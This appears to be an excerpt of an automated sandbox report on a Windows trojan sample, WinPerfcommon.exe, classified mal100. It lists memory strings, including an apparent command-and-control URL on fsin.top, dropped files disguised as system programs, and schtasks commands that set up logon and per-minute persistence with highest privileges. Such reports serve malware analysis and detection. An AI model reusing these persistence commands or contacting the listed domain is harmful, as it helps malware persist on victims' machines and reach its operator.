                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:22:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:22:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:22:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:22:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:22:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: powershell.exe, 00000016.00000002.3285415906.0000020318470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                              Source: powershell.exe, 00000018.00000002.3236041998.000001FAFDD60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros-
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003544000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fsin.top
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fsin.top/
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fsin.top/javascriptCentraldownloads.php
                              Source: powershell.exe, 00000016.00000002.2849335154.0000020310213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2934001847.000001D696DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3054085979.000001B49D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2991988808.0000022337724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 0000001A.00000002.3321971491.000001D69EEA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                              Source: powershell.exe, 00000016.00000002.1860699365.00000203003C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686F98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48DA08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223278D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: WinPerfcommon.exe, 00000000.00000002.1747143226.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1860699365.00000203001A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48D7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223276B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.0000015898F12000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003303000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000016.00000002.1860699365.00000203003C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686F98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48DA08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223278D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: powershell.exe, 00000016.00000002.3291842516.0000020318590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                              Source: powershell.exe, 0000001A.00000002.3321971491.000001D69EEA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                              Source: powershell.exe, 00000016.00000002.1860699365.00000203001A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48D7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223276B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.0000015898F12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 00000016.00000002.2849335154.0000020310213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2934001847.000001D696DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3054085979.000001B49D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2991988808.0000022337724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exeJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Windows\Installer\05a9f81f8aa671Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMPJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeCode function: 0_2_00007FFD9B800D480_2_00007FFD9B800D48
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeCode function: 0_2_00007FFD9B800E430_2_00007FFD9B800E43
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeCode function: 0_2_00007FFD9BC105750_2_00007FFD9BC10575
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeCode function: 49_2_00007FFD9BBF057549_2_00007FFD9BBF0575
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeCode function: 50_2_00007FFD9B7C0D4850_2_00007FFD9B7C0D48
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeCode function: 50_2_00007FFD9B7C0E4350_2_00007FFD9B7C0E43
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\EAqnjiFq.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              Source: zsLwvutf.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: zGtWfQBc.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: izcrMdWN.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: ZQJbcBRg.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: YLyBcRbf.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: PipMsYLy.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: GEhWIfwR.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: fyKARhRs.log.49.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: yHNOGCAC.log.49.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: iFHJmzLo.log.49.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: ZWotDWGG.log.49.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: PoUdTuAY.log.49.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: GKMojBlr.log.49.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: EAqnjiFq.log.49.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: WinPerfcommon.exe, 00000000.00000002.1804824890.000000001BCBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs WinPerfcommon.exe
                              Source: WinPerfcommon.exe, 00000000.00000000.1682250374.00000000004F0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
                              Source: WinPerfcommon.exe, 0000002D.00000002.2312164491.0000000002910000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
                              Source: WinPerfcommon.exe, 0000002F.00000002.2401874949.0000000003521000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
                              Source: WinPerfcommon.exe, 0000002F.00000002.2401874949.00000000035D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
                              Source: WinPerfcommon.exe, 0000002F.00000002.2401874949.000000000352C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
                              Source: WinPerfcommon.exe, 0000002F.00000002.2401874949.0000000003510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
                              Source: WinPerfcommon.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
                              Source: WinPerfcommon.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: WinPerfcommon.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: SgrmBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: SystemSettings.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: StartMenuExperienceHost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@67/71@1/1
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Program Files\Adobe\StartMenuExperienceHost.exeJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\Desktop\zsLwvutf.logJump to behavior
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-nQmtb0EsMA9tAW54k3K0
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile created: C:\Users\user\AppData\Local\Temp\wuved4ivJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat"
                              Source: WinPerfcommon.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: WinPerfcommon.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: WinPerfcommon.exeReversingLabs: Detection: 63%
                              Source: WinPerfcommon.exeVirustotal: Detection: 70%
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile read: C:\Users\user\Desktop\WinPerfcommon.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\WinPerfcommon.exe "C:\Users\user\Desktop\WinPerfcommon.exe"
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP"
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 11 /tr "'C:\Recovery\SystemSettings.exe'" /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SgrmBroker.exe'" /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 5 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /f
